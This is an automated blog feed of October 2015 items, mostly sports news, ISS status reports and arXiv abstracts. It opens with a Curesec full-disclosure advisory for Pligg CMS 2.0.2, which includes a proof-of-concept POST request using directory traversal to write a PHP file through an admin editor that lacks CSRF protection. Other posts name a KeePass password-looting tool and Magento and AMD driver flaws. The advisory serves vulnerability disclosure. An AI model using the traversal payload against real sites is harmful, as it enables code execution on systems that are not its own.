Security Advisory - Curesec Research Team 1. Introduction Affected Product: Pligg CMS 2.0.2 Fixed in: not fixed Fixed Version Link: n/a Vendor Website: http://pligg.com/ Vulnerability Type: Code Execution & CSRF Remote Exploitable: Yes Reported to vendor: 09/01/2015 Disclosed to public: 10/07/2015 Release mode: Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Vulnerability Description The file editor provides the possibility to edit .tpl files stored in the templates directory. But the file editor is vulnerable to directory traversal when saving files, and it does not check the submitted filename against a whitelist of allowed files. It also does not check the file extension. Because of this, it is possible to gain code execution. Admin credentials are required to access the file editor, but the request does not have CSRF protection, so an attacker can gain code execution by getting the admin to visit a website they control while logged in. 3. Proof of Concept POST /pligg-cms-master/admin/admin_editor.php HTTP/1.1 the_file2=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fvar%2Fwww%2Fhtml%2Fpligg-cms-master%2F404.php&updatedfile=&isempty=1&save=Save+Changes 4. Solution This issue was not fixed by the vendor. 5. Report Timeline 09/01/2015 Informed Vendor about Issue (no reply) 09/22/2015 Reminded Vendor of disclosure date 09/22/2015 Vendor replied, issue has been send to staff 09/29/2015 Reminded Vendor of disclosure date (no reply) 10/07/2015 Disclosed to public Blog Reference: http://ift.tt/1ioJGpn

Source: Gmail -> IFTTT-> Blogger

[FD] KeeFarce - A KeePass 2.x database extraction tool

( , ) (, . '.' ) ('. ', ). , ('. ( ) ( (_,) .'), ) _ _, / _____/ / _ \ ____ ____ _____ \____ \==/ /_\ \ _/ ___\/ _ \ / \ / \/ | \\ \__( <_> ) Y Y \ /______ /\___|__ / \___ >____/|__|_| / \/ \/.-. \/ \/:wq (x.0) '=.|w|.=' _=''"''=. presents.. KeeFarce - An in-memory looter for KeePass 2.x databases URL: http://ift.tt/1M4uzxk

Source: Gmail -> IFTTT-> Blogger

[FD] eBay Magento <= 1.9.2.1 XML eXternal Entity Injection (XXE) on PHP FPM

eBay Magento CE <= 1.9.2.1 XML eXternal Entity Injection (XXE) on PHP FPM eBay Magento EE <= 1.14.2.1 Details at: http://ift.tt/1ioJFlf Regards, Dawid Golunski http://legalhackers.com

Source: Gmail -> IFTTT-> Blogger

IC 1871: Inside the Soul Nebula


This cosmic close-up looks deep inside the Soul Nebula. The dark and brooding dust clouds outlined by bright ridges of glowing gas are cataloged as IC 1871. About 25 light-years across, the telescopic field of view spans only a small part of the much larger Heart and Soul nebulae. At an estimated distance of 6,500 light-years the star-forming complex lies within the Perseus spiral arm of the Milky Way, seen in planet Earth's skies toward the constellation Cassiopeia. An example of triggered star formation, the dense star-forming clouds of IC 1871 are themselves sculpted by the intense winds and radiation of the region's massive young stars. This color image adopts a palette made popular in Hubble images of star-forming regions. via NASA http://ift.tt/1kdERR7

Thursday, October 29, 2015

Anonymous plans to reveal names of KKK members

Anonymous has threatened to reveal the identities of 1,000 Ku Klux Klan members. It's hackers vs. haters — round two. The amorphous hacker group .

from Google Alert - anonymous http://ift.tt/1Nc9mm6
via IFTTT

Anonymous Plans to Indentify 1000 KKK Members

The “hacktivist” collective Anonymous have vowed to release the names of “about 1000” Ku Klux Klan members as part of an ongoing operation ...

from Google Alert - anonymous http://ift.tt/1GzUWeg
via IFTTT

ISS Daily Summary Report – 10/29/15

Post Extravehicular Activity (EVA):  Due to the EVA yesterday, the US crew was scheduled for a half duty day.  This morning, Kelly and Lindgren completed post-EVA health assessments.  Kelly, Yui and Lindgren then participated in an EVA debrief session with ground specialists.  Later, Kelly remated wire harness W0142 to the Node 1 Starboard Gore Panel.  The wire harness was demated to provide an upstream physical inhibit for the EVA installation of W2289 during EVA #32.  Lastly, Lindgren completed a refill of the Extravehicular Mobility Unit (EMU) feed water tanks and an ullage dump on EMUs 3003 and 3010.   Plant Gravity Sensing 2 (PGS2) Investigation:  Yui retrieved a Seed Paper Kit from a Minus Eighty Degree Celsius Laboratory Freezer for ISS (MELFI), prepared the Seed Papers for 4 Culture Dishes and then returned the culture dishes to the MELFI.  Tomorrow the seeds will be inserted into the Cell Biology Experiment Facility (CBEF) to start the second of two runs for PGS2.  The PGS2 investigation supports the study of cellular formation of the plant’s gravity sensors and the molecular mechanism for gravity sensing in plants grown in microgravity conditions.   Plasma Kristall-4 (PK-4) Investigation:  Kononenko performed closeout activities for the first run of PK-4, completed today, and prepared the equipment for the next run.  He then replaced the data hard drives with new ones, and then filled the PK-4 Chamber first with cleaning gas and then with Neon gas.  PK-4 is a scientific payload for performing research in the field of ‘Complex Plasmas': low temperature gaseous mixtures composed of ionized gas, neutral gas and micron-sized particles. The micro-particles become highly charged in the plasma and interact strongly with each other which can lead to a self-organized structure of the micro-particles: so-called plasma crystals. Experiments in the facility aim to study Transport Properties, Thermodynamics, Kinetics and Statistical Physics and Non-linear waves and Instabilities in the plasmas.   eValuatIon And monitoring of microBiofiLms insidE the ISS (ViABLE) Experiment:  Kelly touched the palm of his hand to experimental materials located on the top covers of ViABLE bags.  He also blew on experimental materials located on those covers.  This activity is performed approximately every 45 days and the bags are photographed at 6 month intervals.  ViABLE involves the evaluation of microbial biofilm development on metallic and textile space materials located inside and on the cover of Nomex pouches. Microbial biofilms are known for causing damage and contamination on the Mir space station and the ISS.  The potential application of novel methodologies and products to treat space materials may lead to improvements in the environmental quality of confined human habitats in space and on earth.   Habitability:  Today, Kelly documented his recent observations related to human factors and habitability for the Habitability investigation.  Habitability assesses the relationship between crew members and their environment in order to better prepare for future long-duration spaceflights to destinations, such as near earth asteroids and Mars. Observations recorded during 6 month and 1 year missions can help spacecraft designers determine how much habitable volume is required, and whether a mission’s duration impacts how much space crew members need.   Sleep Log:  Kornienko recorded a Sleep Log entry today.  The Sleep ISS-12 experiment monitors ambient light exposure and crew member activity and collects subjective evaluations of sleep and alertness.  The investigation examines the effects of space flight and ambient light exposure on sleep during a year-long mission on the ISS.   Environmental Sampling:  Yui deployed a formaldehyde monitor in the US Lab. It will remain deployed for 2 days.  He also collected air samples in the US Lab and Japanese Experiment Module (JEM) Pressurized Module (JPM) using Grab Sample Containers (GSCs).  These samples will be returned to the ground on 43S for post-flight analysis.     Today’s Planned Activities All activities were completed unless otherwise noted. Hematocrit Test Hematocrit  Hardware Stowage Repair of SM Interior Panel 322 by Installing Overlay Panels – Day 1 PLAZMENNIY KRISTALL. Hard Drive Exchange Counter Measure System (CMS) Harmful Contaminant Measurements in SM Periodic Health Status (PHS) Post EVA Evaluation Analysis of SM Atmosphere for Freon Using Freon Leak Analyzer/Detector (ФИТ) PILOT-T. Experiment Ops PGS2-ELT2 – Cable Reconfig Post-EVA crew health status – data transfer PGS2 – Sample Retrieval from MELFI VIZIR. Calibration of СКП-И Hardware PGS2 – Sample Insertion into MELFI PLAZMENNIY KRISTALL. Filling Chamber with Cleaning Gas Columbus video power up for HAM Radio session Pille Dosimeter Reading after USOS EVA WRS – Recycle Tank Fill from EDV HABIT – Experiment Ops US post-EVA Debrief Conference CONTUR-2. P/L Assembly Setup on panel 418 Treatment of SM structural elements and shell areas with Fungistat Re-mate wire harness W0142 WRS – Recycle Tank Fill from EDV Progress 429 (SM Aft) Transfers and IMS Ops CONTUR-2. Experiment Session HAM Radio session from Columbus FMK Deployment Ops CIR Rack – Equipment Setup Grab Sample Container (GSC) Sampling Operations Initiate Condensate Sampling VIABLE – Kit Inspection COSMOCARD. Closeout Ops HMS – Food Frequency Questionnaire On-orbit Hearing Assessment using EARQ EMU Water Refill Evening Work Prep Terminate Condensate Sampling СОЖ Maintenance) RWS Teardown Evening Work Prep IMS Delta File Prep CONTUR-2. De-installation of master arm with adapter from panel 418 PLAZMENNIY KRISTALL. Gas Exchange in the Chamber to Neon VELO Exercise, Day 1 INTERACTION-2. Experiment Ops Start EMU METOX Regeneration CONTENT. Experiment Ops PLAZMENNIY KRISTALL. Hardware De-Installation and Stowage Prepack Crew Discretionary Conference Preparation of Reports for Roscosmos Web Site and Social Media ECON-M. Observations and Photography   Completed Task List Items P/TV Battery Charger Swap Air Quality Monitor Reposition   Ground Activities All activities were completed unless otherwise noted. MT Translation from WS2 to WS4   Three-Day Look Ahead: Friday, 10/30:  EVA Preparation, JEMAL ExHAM install Saturday, 10/31:  Weekly Cleaning, Crew Off Duty Sunday, 11/01:  Crew Off Duty   QUICK ISS Status – Environmental Control Group:                               Component Status Elektron Off Vozdukh Manual [СКВ] 1 – SM Air Conditioner System (“SKV1”) On [СКВ] 2 – SM Air Conditioner System (“SKV2”) On Carbon Dioxide Removal Assembly (CDRA) Lab Off Carbon […]

from ISS On-Orbit Status Report http://ift.tt/1HfjsMB
via IFTTT

Automatic Synthesis of Geometry Problems for an Intelligent Tutoring System. (arXiv:1510.08525v1 [cs.AI])

This paper presents an intelligent tutoring system, GeoTutor, for Euclidean Geometry that is automatically able to synthesize proof problems and their respective solutions given a geometric figure together with a set of properties true of it. GeoTutor can provide personalized practice problems that address student deficiencies in the subject matter.



from cs.AI updates on arXiv.org http://ift.tt/1Rhd9xz
via IFTTT

Attention with Intention for a Neural Network Conversation Model. (arXiv:1510.08565v1 [cs.NE])

In a conversation or a dialogue process, attention and intention play intrinsic roles. This paper proposes a neural network based approach that models the attention and intention processes. It essentially consists of three recurrent networks. The encoder network is a word-level model representing source side sentences. The intention network is a recurrent network that models the dynamics of the intention process. The decoder network is a recurrent network produces responses to the input from the source side. It is a language model that is dependent on the intention and has an attention mechanism to attend to particular source side words, when predicting a symbol in the response. The model is trained end-to-end without labeling data. Experiments show that this model generates natural responses to user inputs.



from cs.AI updates on arXiv.org http://ift.tt/1P8OEDE
via IFTTT

Transalg: a Tool for Translating Procedural Descriptions of Discrete Functions to SAT. (arXiv:1405.1544v2 [cs.AI] UPDATED)

In this paper we present the Transalg system, designed to produce SAT encodings for discrete functions, written as programs in a specific language. Translation of such programs to SAT is based on propositional encoding methods for formal computing models and on the concept of symbolic execution. We used the Transalg system to make SAT encodings for a number of cryptographic functions.



from cs.AI updates on arXiv.org http://ift.tt/1kOzcdi
via IFTTT

Towards a General Framework for Actual Causation Using CP-logic. (arXiv:1410.7063v3 [cs.AI] UPDATED)

Since Pearl's seminal work on providing a formal language for causality, the subject has garnered a lot of interest among philosophers and researchers in artificial intelligence alike. One of the most debated topics in this context regards the notion of actual causation, which concerns itself with specific - as opposed to general - causal claims. The search for a proper formal definition of actual causation has evolved into a controversial debate, that is pervaded with ambiguities and confusion. The goal of our research is twofold. First, we wish to provide a clear way to compare competing definitions. Second, we also want to improve upon these definitions so they can be applied to a more diverse range of instances, including non-deterministic ones. To achieve these goals we will provide a general, abstract definition of actual causation, formulated in the context of the expressive language of CP-logic (Causal Probabilistic logic). We will then show that three recent definitions by Ned Hall (originally formulated for structural models) and a definition of our own (formulated for CP-logic directly) can be viewed and directly compared as instantiations of this abstract definition, which allows them to deal with a broader range of examples.



from cs.AI updates on arXiv.org http://ift.tt/1wwAIcw
via IFTTT

Approximate Counting in SMT and Value Estimation for Probabilistic Programs. (arXiv:1411.0659v2 [cs.LO] UPDATED)

#SMT, or model counting for logical theories, is a well-known hard problem that generalizes such tasks as counting the number of satisfying assignments to a Boolean formula and computing the volume of a polytope. In the realm of satisfiability modulo theories (SMT) there is a growing need for model counting solvers, coming from several application domains (quantitative information flow, static analysis of probabilistic programs). In this paper, we show a reduction from an approximate version of #SMT to SMT.

We focus on the theories of integer arithmetic and linear real arithmetic. We propose model counting algorithms that provide approximate solutions with formal bounds on the approximation error. They run in polynomial time and make a polynomial number of queries to the SMT solver for the underlying theory, exploiting "for free" the sophisticated heuristics implemented within modern SMT solvers. We have implemented the algorithms and used them to solve the value problem for a model of loop-free probabilistic programs with nondeterminism.



from cs.AI updates on arXiv.org http://ift.tt/1uoiZGy
via IFTTT

FIFA candidate Sheikh Salman denies role in rights abuses

MANAMA, Bahrain (AP) FIFA presidential candidate Sheikh Salman bin Ibrahim Al Khalifa has issued his strongest denial yet against claims he aided human rights abuses after pro-democracy protests.

from FOX Sports Digital http://ift.tt/1GNGvDb
via IFTTT

FIFA candidate Sheikh Salman denies role in rights abuse

MANAMA, Bahrain (AP) FIFA presidential candidate Sheikh Salman bin Ibrahim Al Khalifa has issued his strongest denial yet against claims he aided human rights abuses after pro-democracy protests.

from FOX Sports Digital http://ift.tt/1P0JpY4
via IFTTT

Sampdoria held to 1-1 draw at home to Empoli in Serie A

GENOA, Italy (AP) Sampdoria was held to a 1-1 draw by Empoli in Serie A on Thursday but maintained its unbeaten home record.

from FOX Sports Digital http://ift.tt/1Obaesv
via IFTTT

Ocean City, MD's surf is Good

October 28, 2015 at 07:00PM, the surf is Good!

Ocean City, MD Summary


Surf: shoulder high to 1 ft overhead
Maximum: 1.836m (6.02ft)
Minimum: 1.224m (4.02ft)

Maryland-Delaware Summary


from Surfline http://ift.tt/1kVmigH
via IFTTT

Anonymous threatens to reveal names of 1000 KKK members

Hacker collective Anonymous has threatened to reveal the names of 1000 Ku Klux Klan members. The two have been at odds since the Ferguson ...

from Google Alert - anonymous http://ift.tt/1M0iZ2W
via IFTTT

Anonymous donor, firefighters help save haunted house

Anonymous donor, firefighters help save haunted house. Oct. 29, 2015 - 1:25 - Rush is on to get iconic haunted house ready in Washington.

from Google Alert - anonymous http://ift.tt/1PTuZct
via IFTTT

Paul Gascoigne fined by court after harassing ex-girlfriend

BOURNEMOUTH, England (AP) Former England player Paul Gascoigne was fined and issued with a restraining order on Thursday after he pleaded guilty to sending a series of abusive tweets, phone calls and messages to his ex-girlfriend.

from FOX Sports Digital http://ift.tt/1WlzUSs
via IFTTT

Liverpool poses next challenge for under-pressure Mourinho

LONDON (AP) If things get any worse, Jose Mourinho might not last much longer in the Chelsea dugout.

from FOX Sports Digital http://ift.tt/1XC85rr
via IFTTT

Anonymous George, Earl of Wessex

Tinkercad user Anonymous George, Earl of Wessex. I'm a programmer, geek, hacker, coder, hipster, actor, and pitcher. I build random stuff for no ...

from Google Alert - anonymous http://ift.tt/1jUzjLT
via IFTTT

Ravens Buzz: Starting secondary may be intact this week for first time since Oct. 11; Philip Rivers 329 yds/game vs. BAL (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

I have a new follower on Twitter


ApfelSina
ApfelSina und Twitter gehört neben Instagram, Snapchat und Whatsapp nun zu meinen Leidenschaften
Frankfurt am Main, Hessen

Following: 614 - Followers: 32

October 29, 2015 at 12:03PM via Twitter http://twitter.com/ApfelSina18

Friends of Bob Ross! MEGA-MARATHON!

BlogCartoon3

Friends of Bob Ross! MEGA-MARATHON! The popular Twitch-TV will broadcast every episode of The Joy of Painting, in an epic marathon starting today at 2PM PST on http://ift.tt/1WkFaFT. That’s 403 episodes of Bob Ross that will play over the course of 8.5 days. Happy Painting!




from The 'hotspot' for all things Bob Ross. http://ift.tt/1Rga0hF
via IFTTT

Ravens: Steve Smith's competitive arrogance is alive and well, so not everyone believes he's really retiring - Trotter (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Struggling Greece hires Skibbe as national team coach

ATHENS, Greece (AP) The Greek football association has hired Michael Skibbe of Germany as the new national team coach, the fourth man to take the position in little over a year following the country's disastrous European Championship qualifying campaign.

from FOX Sports Digital http://ift.tt/1GMcsMq
via IFTTT

Rooney laser incident during shootout investigated by FA

LONDON (AP) Manchester United captain Wayne Rooney appeared to have a laser directed at his face during Wednesday's League Cup loss to Middlesbrough and the incident will be investigated by the English Football Association.

from FOX Sports Digital http://ift.tt/1MWcRsk
via IFTTT

Javier Mascherano admits to unpaid taxes in Spain

MADRID (AP) Barcelona defender Javier Mascherano told a court on Thursday that he did not properly pay his taxes in Spain after moving from Liverpool.

from FOX Sports Digital http://ift.tt/1WjpR5K
via IFTTT

Bayern to Frankfurt, Dortmund to Bremen in Bundesliga

FRANKFURT, Germany (AP) Bayern Munich director Matthias Sammer found something to complain about despite the team's record-breaking season and its latest success.

from FOX Sports Digital http://ift.tt/1KHt6b2
via IFTTT

MIT Scientists: Now You Can See Through Walls with Wi-Fi

Forget about Superman's X-rays vision, you can now see through walls using WI-FI device only. Scientists at MIT's Computer Science and Artificial Intelligence Lab (CSAIL) have developed a device that uses WiFi signals to effectively see through walls and other obstacles, and identify which persons are standing behind it. Dubbed RF Capture, the new system is enhanced version of their


from The Hacker News http://ift.tt/1OZYvgJ
via IFTTT

PSG still needs a rival as it bids for 4th straight title

PARIS (AP) Paris Saint-Germain's quest for a fourth straight title is looking so comfortable that the talk is centering on how many domestic records it might break.

from FOX Sports Digital http://ift.tt/1XB8muX
via IFTTT

Paul Gascoigne pleads guilty to harassing ex-girlfriend

BOURNEMOUTH, England (AP) Former England player Paul Gascoigne has pleaded guilty to harassing his former girlfriend and assaulting a photographer.

from FOX Sports Digital http://ift.tt/1Gyt6iF
via IFTTT

[FD] CVE-2015-7723 - Privilege Escalation Via Symlink Attacks On POSIX Shared Memory With Insecure Permissions In AMD fglrx-driver

[FD] CVE-2015-7724 - Privilege Escalation Via Symlink Attacks On POSIX Shared Memory With Insecure Permissions In AMD fglrx-driver

Wednesday, October 28, 2015

ISS Daily Summary Report – 10/28/15

Extravehicular Activity (EVA) #32:  EVA Crew-1 (EV1) Kelly and EV2 Lindgren egressed the Airlock at 7:03am CDT for EVA #32.  The Phase Elapsed Time was 7 hours and 16 minutes.  Prior to egress, for a short period of time, EV2 bumped the position of the water valve on his suit.  The suit was cleared to proceed after verification that water was not sublimating and the suit operated nominally throughout the EVA.  There will be an additional water recharge and inspection completed on that suit prior to the next EVA.   The planned objectives for the EVA were as follows: Alpha Magnetic Spectrometer (AMS) Blanket and TTCS Wedge Install Main Bus Switching Unit (MBSU) Multi-Layered Insulation (MLI) Removal and Skirt Tie-Down Space Station Remote Manipulator System (SSRMS) Latching End Effector (LEE)-B Lube Pressurized Mating Adapter (PMA)-3 / International Docking Adapter (IDA)-3 Cable Route Node 3 (N3) Non-Propulsive Vent (NPV) Install   The crew fully completed the AMS and MBSU tasks.  They completed the high priority LEE Lube tasks for lubing the ball screws and linear bearing tracks.  The lower priority task of lubing the equalization brackets and rollers was not completed.  The crew completed the PMA-3 IDA-3 cable routing and the aft portion of the PMA-3 power cable routing.  The forward portion of the PMA-3 power cable routing and the N3 NPV install were deferred to a future EVA.  The deferred tasks are not an impact to current ISS operations.   Plasma Kristall-4 (PK-4) Operations:  Kononenko provided support for the PK-4 experiment started yesterday by exchanging data hard drives.  Plasma Kristall-4 is a complex European Space Agency (ESA) plasma laboratory installed in the Columbus European Physiology Module (EPM) rack and operated by Russian crewmembers.  PK-4 supports research in the field of Complex Plasmas: low temperature gaseous mixtures composed of ionized gas, neutral gas and micron-sized particles. The micro-particles become highly charged in the plasma and interact strongly with each other, which can lead to a self-organized structure of the micro-particles (i.e., “plasma crystals”).   Reaction Self Test:  Kelly will complete a session today for the Reaction Self Test investigation.  Reaction Self Test helps crewmembers objectively identify when their performance capability is degraded by various fatigue-related conditions that can occur as a result of ISS operations and time in space (e.g., acute and chronic sleep restriction, slam shifts, extravehicular activity (EVA), and residual sedation from sleep medications).   Sleep Log:  Kornienko recorded a Sleep Log entry today.  The Sleep ISS-12 experiment monitors ambient light exposure and crew member activity and collects subjective evaluations of sleep and alertness.  The investigation examines the effects of space flight and ambient light exposure on sleep during a year-long mission on the ISS.   Today’s Planned Activities All activities are on schedule unless otherwise noted. NEIROIMMUNITET. Saliva Test Closing USOS Window Shutters Photo/TV EVA Camera Test ISS  HAM RADIO Power Down EVA CUCU Deactivation EMU Preparation for US EVA SEISMOPROGNOZ. Downlink data from Control and Data Acquisition Module (МКСД) HDD (start) Restoring Makita Battery – Equipment setup, assemble charging setup Comm configuration for EVA PLAZMENNIY KRISTALL. Hard Drive Exchange MOTOCARD. Experiment EMU Prep for EVA Prebreathe in EMU Makita tool battery discharge COSMOCARD. Setup. Starting 24-hr ECG Recording Installation of Makita battery No.1 to charge Brine (urine) transfer from EDV-U to Progress 429 (SM Aft) Rodnik БВ1 tank Repair and Installation of Overlay Panels on SM panel 322 -Search for and Configure Equipment Crew Lock Depress Remove battery No.1 from charge,  Install Makita tool No.2 to charge Soyuz 717 Samsung tablet charge – start NEIROIMMUNITET. Closeout Ops Main Bus Switching Unit (MBSU) USOS EVA Tasks AMS blanket install Remove battery 2 from charge, Install Makita tool battery No.7 to charge CALCIUM. Experiment Session 11 Progress 429 (SM Aft) Transfers and IMS Ops SM Ventilation System Preventive Maintenance. Group В1 Relocating PBAs for upcoming EVA Main Bus Switching Unit (MBSU) USOS EVA Tasks USOS EVA PMA3 Cable Routing USOS EVA LEE (SSRMS) Lube SSRMS Motion for LEE Lube Remove battery No.7 from charge, Install Makita tool battery No.8 to charge СОЖ maintenance Soyuz 717 Samsung tablet charging – end USOS EVA PMA3 Cable Routing Tasks Life On The Station Photo and Video Terminate Makita Battery No.8 charge, Configuration Teardown, Battery and Equipment Stowage NPV Installation USOS EVA PMA3 Cable Routing Tasks IMS Delta File Prep INTERACTION-2. Experiment Crew Lock Ingress Closing USOS Window Shutters SEISMOPROGNOZ. Download data from Control and Data Acquisition Module (МКСД) HDD (end) and start backup EVA Glove Photo Setup Crew Lock Pre-Repress Crew Lock Repress USOS Post-EVA Cleanup Return to nominal comm configuration after USOS EVA Hematocrit.  Hardware Setup EVA Camera Reconfig EMU Glove photos downlink Reaction Self-Test (Sleep) [Scheduled just prior to crew sleep]   Completed Task List Items None   Ground Activities All activities are on schedule unless otherwise noted. System commanding in support of EVA   Three-Day Look Ahead: Thursday, 10/29:  1/2 Duty Day, Post EVA Activities, Plant Gravity Sensing 2, VIABLE Training Friday, 10/30:  EVA Preparation, JEMAL ExHAM install Saturday, 10/31:  Weekly Cleaning, Crew Off Duty   QUICK ISS Status – Environmental Control Group:                               Component Status Elektron Off Vozdukh Manual [СКВ] 1 – SM Air Conditioner System (“SKV1”) On [СКВ] 2 – SM Air Conditioner System (“SKV2”) Off Carbon Dioxide Removal Assembly (CDRA) Lab Off Carbon Dioxide Removal Assembly (CDRA) Node 3 Operate Major Constituent Analyzer (MCA) Lab Shutdown Major Constituent Analyzer (MCA) Node 3 Operate Oxygen Generation Assembly (OGA) Process Urine Processing Assembly (UPA) Standby Trace Contaminant Control System (TCCS) Lab Off Trace Contaminant Control System (TCCS) Node 3 Full Up  

from ISS On-Orbit Status Report http://ift.tt/1kcpDvC
via IFTTT

I have a new follower on Twitter


DJ KING ASSASSIN
Put Yo Mind To It https://t.co/emEfX8QnhF #2PAC #THUGLIFE #ICET #WYCLEF #KOKANE #EAZYE #LAYLAW #DEEYADA #COLD187 #KRAYZIEBONE #4TAY #SCC #ZAPP #FLTG #COREDJS
Live From Compton, CA
http://t.co/E1UniVHQCu
Following: 2697852 - Followers: 4335174

October 28, 2015 at 09:10PM via Twitter http://twitter.com/DjKingAssassin

Anonymous Threatens to Release Names of KKK Members

The hacker collective known as Anonymous" is threatening to strip anonymity from the Ku Klux Klan.

from Google Alert - anonymous http://ift.tt/1HcHebY
via IFTTT

Suspended Platini insists he's still the best to lead FIFA

GENEVA (AP) Suspended by FIFA as the presidential election contest kicks off, Michel Platini insists he is still the best candidate to succeed Sepp Blatter.

from FOX Sports Digital http://ift.tt/20bifBu
via IFTTT

Computing the Ramsey Number R(4,3,3) using Abstraction and Symmetry breaking. (arXiv:1510.08266v1 [cs.AI])

The number $R(4,3,3)$ is often presented as the unknown Ramsey number with the best chances of being found "soon". Yet, its precise value has remained unknown for almost 50 years. This paper presents a methodology based on \emph{abstraction} and \emph{symmetry breaking} that applies to solve hard graph edge-coloring problems. The utility of this methodology is demonstrated by using it to compute the value $R(4,3,3)=30$. Along the way it is required to first compute the previously unknown set ${\cal R}(3,3,3;13)$ consisting of 78{,}892 Ramsey colorings.



from cs.AI updates on arXiv.org http://ift.tt/1NBZhNL
via IFTTT

Communication: Words and Conceptual Systems. (arXiv:1507.08073v12 [cs.AI] UPDATED)

Words (phrases or symbols) play a key role in human life. Word (phrase or symbol) representation is the fundamental problem for knowledge representation and understanding. A word (phrase or symbol) usually represents a name of a category. However, it is always a challenge that how to represent a category can make it easily understood. In this paper, a new representation for a category is discussed, which can be considered a generalization of classic set. In order to reduce representation complexity, the economy principle of category representation is proposed. The proposed category representation provides a powerful tool for analyzing conceptual systems, relations between words, communication, knowledge, situations. More specifically, the conceptual system, word relations and communication are mathematically defined and classified such as ideal conceptual system, perfect communication and so on; relation between words and sentences is also studied, which shows that knowledge are words. Furthermore, how conceptual systems and words depend on situations is presented.



from cs.AI updates on arXiv.org http://ift.tt/1KzLNTZ
via IFTTT

Man United stunned in League Cup by 2nd-tier Middlesbrough

LONDON (AP) Manchester United was eliminated from the League Cup by second-tier Middlesbrough in a penalty shootout on Wednesday in the latest fourth-round shock.

from FOX Sports Digital http://ift.tt/1WiqnRn
via IFTTT

Roma beats Udinese 3-1 to return to top of Serie A

MILAN (AP) Roma returned to the top of Serie A with a 3-1 win over Udinese on Wednesday, but there was more misery for Juventus as the four-time defending champion lost 1-0 at Sassuolo with defender Giorgio Chiellini sent off.

from FOX Sports Digital http://ift.tt/1P66nM4
via IFTTT

After 3 draws, Klopp finally wins as Liverpool manager

LONDON (AP) Juergen Klopp celebrated his first victory as Liverpool manager on Wednesday following three draws, with his new team reaching the League Cup quarterfinals by eliminating Bournemouth.

from FOX Sports Digital http://ift.tt/1PV5pTD
via IFTTT

Dortmund wins 7-1, Moenchengladbach beats Schalke 2-0

FRANKFURT, Germany (AP) Borussia Moenchengladbach beat Schalke for the second time in four days, winning 2-0 in the second round of the German Cup on Wednesday, while last season's runner-up Borussia Dortmund routed second-division Paderborn 7-1.

from FOX Sports Digital http://ift.tt/1LYOHO7
via IFTTT

Barcelona held to 0-0 draw in Copa del Rey

VILLANUEVA DE LA SERENA, Spain (AP) Barcelona was held to a scoreless draw by third-tier Villanovense on Wednesday in a disappointing start to the Copa del Rey for the defending champion.

from FOX Sports Digital http://ift.tt/1HcihNY
via IFTTT

Court moves forward with probe into Neymar's transfer

MADRID (AP) Spain's national court has rejected Neymar's request to throw out a probe into his transfer to Barcelona two years ago.

from FOX Sports Digital http://ift.tt/1XzlGjh
via IFTTT

Biggest Free Hosting Company Hacked; 13.5 Million Plaintext Passwords Leaked

The world’s most popular Free Web Hosting company 000Webhost has suffered a major data breach, exposing more than 13.5 Million of its customers' personal records online. The stolen data includes usernames, passwords in plain text, email addresses, IP addresses and last names of around 13.5 Million of 000Webhost's customers. According to a recent report published by Forbes, the Free


from The Hacker News http://ift.tt/1LCq1g8
via IFTTT

A guide to the FIFA presidential candidates

GENEVA (AP) The FIFA presidential election on Feb. 26 will be a 7-man race. For now, at least.

from FOX Sports Digital http://ift.tt/1kb7caz
via IFTTT

Visa threatens to end FIFA backing if reforms unsatisfactory

LONDON (AP) FIFA sponsor Visa has threatened to cut its ties with the scandal-tarnished governing body if the credit card company isn't satisfied with reforms.

from FOX Sports Digital http://ift.tt/1KFPth0
via IFTTT

Serie A struggler Bologna fires coach Delio Rossi

BOLOGNA, Italy (AP) Bologna has fired coach Delio Rossi, a day after a 1-0 loss at home to 10-man Inter Milan.

from FOX Sports Digital http://ift.tt/1P56589
via IFTTT

UNM Swimming and Diving Receives Anonymous Donation

ALBUQUERQUE, N.M. – The University of New Mexico swimming and diving program has received an anonymous donation of $20,000. The gift ...

from Google Alert - anonymous http://ift.tt/1PQQ8Ee
via IFTTT

Bremen's US striker Johannsson sidelined after surgery

BREMEN, Germany (AP) Werder Bremen says United States striker Aron Johannsson has undergone surgery on a hip problem and will be out for several weeks.

from FOX Sports Digital http://ift.tt/1OYwNkk
via IFTTT

Blatter chastises FIFA ethics committee for banning him

GENEVA (AP) Taking a dictatorial approach to his role as FIFA president, Sepp Blatter lashed out at the ethics committee for being ''against me'' and criticized his 90-day ban as being ''total nonsense.''

from FOX Sports Digital http://ift.tt/1NAC7Hn
via IFTTT

Mascherano suspended 2 games, will get to face Real Madrid

MADRID (AP) Barcelona defender Javier Mascherano will be able to face Real Madrid in the Spanish league next month after being handed only a two-game suspension for complaining to a linesman.

from FOX Sports Digital http://ift.tt/1Mt08mB
via IFTTT

Bremen's US striker Aron Johansson has groin surgery

BREMEN, Germany (AP) Werder Bremen says United States striker Aron Johansson has undergone groin surgery and will be out for several weeks.

from FOX Sports Digital http://ift.tt/1XyDtHn
via IFTTT

Brazil's Marin agrees to be extradited in FIFA bribery case

BERN, Switzerland (AP) Switzerland's justice ministry says 2014 World Cup organizing head Jose Maria Marin of Brazil has agreed to be extradited to the United States in the FIFA bribery case.

from FOX Sports Digital http://ift.tt/1kRnVQT
via IFTTT

Anonymous To De-Hood 1000 KKK Members

“We are not attacking you because of what you believe in as we fight for freedom of speech,” Anonymous said in a statement released last week.

from Google Alert - anonymous http://ift.tt/1k9VGMR
via IFTTT

It's Now Legal to Jailbreak Smart TV, Smartphone Or Tablet

In our previous article, The Hacker News reported that the EFF had won its battle over the limits that were put on a car's copyrighted software, allowing car owners to fiddle with their car's software. EFF has participated in the rulemaking procedure held by the United States copyright office (DMCA) earlier also, and this time they have got a bag full of success. As… ...Library of


from The Hacker News http://ift.tt/1N7mgBN
via IFTTT

Austria keeper Almer out for months with knee injury

VIENNA (AP) Austria goalkeeper Robert Almer will miss the team's friendly against Switzerland in November after partly tearing a ligament in his left knee.

from FOX Sports Digital http://ift.tt/1MTc5fG
via IFTTT

ISS Daily Summary Report – 10/27/15

